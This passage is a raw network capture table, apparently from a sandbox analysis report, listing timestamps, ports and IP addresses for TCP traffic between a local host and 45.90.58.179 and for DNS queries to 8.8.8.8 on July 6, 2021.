Jul 6, 2021 14:31:30.413809061 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.413822889 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.413850069 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.413855076 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.413877010 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.413903952 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.413921118 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.413938046 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.413939953 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.413940907 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.413950920 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.413954973 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.413990974 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.414000034 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.414014101 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.414020061 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.414040089 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.414048910 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.414073944 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.414076090 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.414103031 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.414107084 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.414129972 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.414130926 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.414146900 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.414158106 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.414175987 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.414186001 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.414196968 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.414212942 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.414239883 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.414266109 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.414267063 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.414293051 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.414308071 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.414319992 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.414338112 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.414350986 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.414376974 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.414380074 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.414403915 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.414407015 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.414431095 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.414433002 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.414453030 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.414458036 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.414485931 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.414489985 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.414511919 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.414530993 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.414539099 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.414566040 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.414566994 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.414614916 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.446516037 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.446549892 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.446580887 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.446609020 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.451878071 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.451904058 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.452032089 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.452083111 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.452117920 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.452125072 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.452150106 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.452159882 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.452178955 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.452204943 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.452208042 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.452214003 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.452219963 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.452233076 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.452249050 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.452260971 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.452290058 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.452291012 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.452317953 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.452344894 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.452347040 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.452358961 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.452362061 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.452373028 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.452400923 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.452430010 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.452464104 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.452491045 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.452497005 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.452503920 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.452507019 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.452508926 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.452519894 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.452528000 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.452558994 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.452588081 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.452588081 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.452596903 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.452622890 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.452631950 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.452651978 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.452653885 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.452686071 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.452687025 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.452693939 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.452738047 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.452748060 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.452779055 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.452797890 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.452802896 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.452827930 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.452833891 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.452858925 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.452863932 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.452877045 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.452892065 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.452919006 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.452919960 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.452946901 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.452970982 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.453003883 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.453007936 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.453020096 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.453022957 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.453026056 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.453032017 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.453061104 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.453099012 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.453133106 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.453170061 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.453207016 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.453243017 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.453278065 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.453319073 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.453356028 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.453391075 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.453433037 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.453460932 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.453488111 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.453516006 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.453547001 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.453573942 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.453602076 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.453629971 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.453656912 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.453685045 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.453711033 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.453737974 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.453771114 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.453798056 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.453826904 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.453850985 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.453881025 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.453907013 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.453933954 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.453962088 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.453989029 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.454019070 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.454046011 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.454046965 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.454056025 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.454057932 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.454060078 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.454061985 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.454063892 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.454065084 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.454066992 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.454068899 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.454071045 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.454071999 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.454073906 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.454076052 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.454077005 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.454077959 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.454080105 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.454082012 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.454083920 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.454085112 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.454087019 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.454087973 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.454090118 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.454092026 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.454093933 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.454094887 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.454097033 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.454097986 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.454104900 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.454133034 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.454139948 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.454143047 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.454159975 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.454190016 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.454231024 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.454237938 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.454238892 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.454271078 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.454278946 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.454296112 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.454332113 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.454359055 CEST	80	49894	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:30.454379082 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.454385996 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:30.454425097 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:33.654603004 CEST	49894	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:33.655867100 CEST	49895	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:35.434421062 CEST	49897	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:35.435128927 CEST	49896	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:35.472347021 CEST	80	49897	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:35.473426104 CEST	80	49896	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:35.473546028 CEST	49897	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:35.473789930 CEST	49896	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:35.488914013 CEST	49896	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:35.527918100 CEST	80	49896	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:35.547017097 CEST	80	49896	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:35.547055006 CEST	80	49896	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:35.547079086 CEST	80	49896	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:35.547147036 CEST	49896	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:35.547163963 CEST	49896	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:35.547167063 CEST	49896	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:36.889792919 CEST	49896	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:36.890913963 CEST	49897	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:56.736748934 CEST	443	49735	142.250.180.206	192.168.2.4
Jul 6, 2021 14:31:56.736917019 CEST	49735	443	192.168.2.4	142.250.180.206

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 6, 2021 14:29:27.962467909 CEST	59123	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:29:28.010124922 CEST	53	59123	8.8.8.8	192.168.2.4
Jul 6, 2021 14:29:29.061316967 CEST	54531	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:29:29.107556105 CEST	53	54531	8.8.8.8	192.168.2.4
Jul 6, 2021 14:29:29.715358019 CEST	49714	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:29:29.779644012 CEST	53	49714	8.8.8.8	192.168.2.4
Jul 6, 2021 14:29:30.170840025 CEST	58028	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:29:30.216695070 CEST	53	58028	8.8.8.8	192.168.2.4
Jul 6, 2021 14:29:31.608051062 CEST	53097	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:29:31.654582977 CEST	53	53097	8.8.8.8	192.168.2.4
Jul 6, 2021 14:29:32.837521076 CEST	49257	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:29:32.896166086 CEST	53	49257	8.8.8.8	192.168.2.4
Jul 6, 2021 14:29:36.391802073 CEST	62389	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:29:36.448542118 CEST	53	62389	8.8.8.8	192.168.2.4
Jul 6, 2021 14:29:37.630316973 CEST	49910	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:29:37.688647032 CEST	53	49910	8.8.8.8	192.168.2.4
Jul 6, 2021 14:29:37.924479008 CEST	55854	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:29:37.973083973 CEST	53	55854	8.8.8.8	192.168.2.4
Jul 6, 2021 14:29:38.647814989 CEST	64549	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:29:38.660319090 CEST	63153	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:29:38.709481955 CEST	53	64549	8.8.8.8	192.168.2.4
Jul 6, 2021 14:29:38.719659090 CEST	53	63153	8.8.8.8	192.168.2.4
Jul 6, 2021 14:29:39.370342016 CEST	52991	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:29:39.417810917 CEST	53	52991	8.8.8.8	192.168.2.4
Jul 6, 2021 14:29:40.821963072 CEST	53700	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:29:40.887712955 CEST	53	53700	8.8.8.8	192.168.2.4
Jul 6, 2021 14:29:41.339418888 CEST	51726	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:29:41.394079924 CEST	53	51726	8.8.8.8	192.168.2.4
Jul 6, 2021 14:29:41.412311077 CEST	56794	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:29:41.485426903 CEST	53	56794	8.8.8.8	192.168.2.4
Jul 6, 2021 14:29:42.175029039 CEST	56534	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:29:42.237148046 CEST	53	56534	8.8.8.8	192.168.2.4
Jul 6, 2021 14:29:43.165678024 CEST	56627	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:29:43.243382931 CEST	53	56627	8.8.8.8	192.168.2.4
Jul 6, 2021 14:29:43.908132076 CEST	56621	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:29:43.974461079 CEST	53	56621	8.8.8.8	192.168.2.4
Jul 6, 2021 14:29:43.996174097 CEST	63116	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:29:44.042716026 CEST	53	63116	8.8.8.8	192.168.2.4
Jul 6, 2021 14:29:44.231865883 CEST	64078	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:29:44.298285007 CEST	53	64078	8.8.8.8	192.168.2.4
Jul 6, 2021 14:29:44.415155888 CEST	64801	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:29:44.471496105 CEST	53	64801	8.8.8.8	192.168.2.4
Jul 6, 2021 14:29:44.545381069 CEST	61721	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:29:44.591345072 CEST	53	61721	8.8.8.8	192.168.2.4
Jul 6, 2021 14:29:45.118194103 CEST	51255	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:29:45.164850950 CEST	53	51255	8.8.8.8	192.168.2.4
Jul 6, 2021 14:29:45.431371927 CEST	61522	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:29:45.447900057 CEST	52337	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:29:45.486419916 CEST	53	61522	8.8.8.8	192.168.2.4
Jul 6, 2021 14:29:45.505383968 CEST	53	52337	8.8.8.8	192.168.2.4
Jul 6, 2021 14:29:46.560743093 CEST	55046	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:29:46.615216017 CEST	53	55046	8.8.8.8	192.168.2.4
Jul 6, 2021 14:29:47.622283936 CEST	49612	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:29:47.671457052 CEST	53	49612	8.8.8.8	192.168.2.4
Jul 6, 2021 14:29:48.431241989 CEST	49285	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:29:48.479466915 CEST	53	49285	8.8.8.8	192.168.2.4
Jul 6, 2021 14:29:49.327440023 CEST	50601	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:29:49.387201071 CEST	53	50601	8.8.8.8	192.168.2.4
Jul 6, 2021 14:29:50.971174002 CEST	60875	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:29:51.061072111 CEST	53	60875	8.8.8.8	192.168.2.4
Jul 6, 2021 14:29:53.205843925 CEST	56448	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:29:53.251801014 CEST	53	56448	8.8.8.8	192.168.2.4
Jul 6, 2021 14:29:54.011359930 CEST	59172	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:29:54.060882092 CEST	53	59172	8.8.8.8	192.168.2.4
Jul 6, 2021 14:29:54.891967058 CEST	62420	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:29:54.939440012 CEST	53	62420	8.8.8.8	192.168.2.4
Jul 6, 2021 14:29:55.879573107 CEST	60579	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:29:55.925674915 CEST	53	60579	8.8.8.8	192.168.2.4
Jul 6, 2021 14:29:56.733414888 CEST	50183	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:29:56.788058996 CEST	53	50183	8.8.8.8	192.168.2.4
Jul 6, 2021 14:29:57.419780970 CEST	61531	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:29:57.477514029 CEST	53	61531	8.8.8.8	192.168.2.4
Jul 6, 2021 14:30:01.098906994 CEST	49228	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:30:01.148099899 CEST	53	49228	8.8.8.8	192.168.2.4
Jul 6, 2021 14:30:02.227508068 CEST	59794	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:30:02.284509897 CEST	53	59794	8.8.8.8	192.168.2.4
Jul 6, 2021 14:30:02.464463949 CEST	55916	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:30:02.513778925 CEST	53	55916	8.8.8.8	192.168.2.4
Jul 6, 2021 14:30:06.392724991 CEST	52752	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:30:06.450882912 CEST	53	52752	8.8.8.8	192.168.2.4
Jul 6, 2021 14:30:07.238615036 CEST	60542	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:30:07.286909103 CEST	53	60542	8.8.8.8	192.168.2.4
Jul 6, 2021 14:30:07.395760059 CEST	52752	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:30:07.446923018 CEST	53	52752	8.8.8.8	192.168.2.4
Jul 6, 2021 14:30:08.248337984 CEST	60542	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:30:08.304994106 CEST	53	60542	8.8.8.8	192.168.2.4
Jul 6, 2021 14:30:08.412575960 CEST	52752	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:30:08.474319935 CEST	53	52752	8.8.8.8	192.168.2.4
Jul 6, 2021 14:30:09.644217968 CEST	60542	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:30:09.699520111 CEST	53	60542	8.8.8.8	192.168.2.4
Jul 6, 2021 14:30:10.427695990 CEST	52752	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:30:10.475250006 CEST	53	52752	8.8.8.8	192.168.2.4
Jul 6, 2021 14:30:11.653471947 CEST	60542	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:30:11.715249062 CEST	53	60542	8.8.8.8	192.168.2.4
Jul 6, 2021 14:30:13.253243923 CEST	60689	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:30:13.299593925 CEST	53	60689	8.8.8.8	192.168.2.4
Jul 6, 2021 14:30:13.873713970 CEST	64206	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:30:13.933329105 CEST	53	64206	8.8.8.8	192.168.2.4
Jul 6, 2021 14:30:14.114526033 CEST	50904	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:30:14.160443068 CEST	53	50904	8.8.8.8	192.168.2.4
Jul 6, 2021 14:30:14.388634920 CEST	52752	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:30:14.444457054 CEST	53	52752	8.8.8.8	192.168.2.4
Jul 6, 2021 14:30:15.685214996 CEST	60542	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:30:15.742693901 CEST	53	60542	8.8.8.8	192.168.2.4
Jul 6, 2021 14:30:18.157454014 CEST	57525	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:30:18.203434944 CEST	53	57525	8.8.8.8	192.168.2.4
Jul 6, 2021 14:30:18.768455029 CEST	53814	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:30:18.823123932 CEST	53	53814	8.8.8.8	192.168.2.4
Jul 6, 2021 14:30:19.061258078 CEST	53418	53	192.168.2.4	8.8.8.8
Jul 6, 2021 14:30:19.109352112 CEST	53	53418	8.8.8.8	192.168.2.4
Jul 6, 2021 14:30:21.497936964 CEST	62833	53	192.168.2.4	8.8.8.8
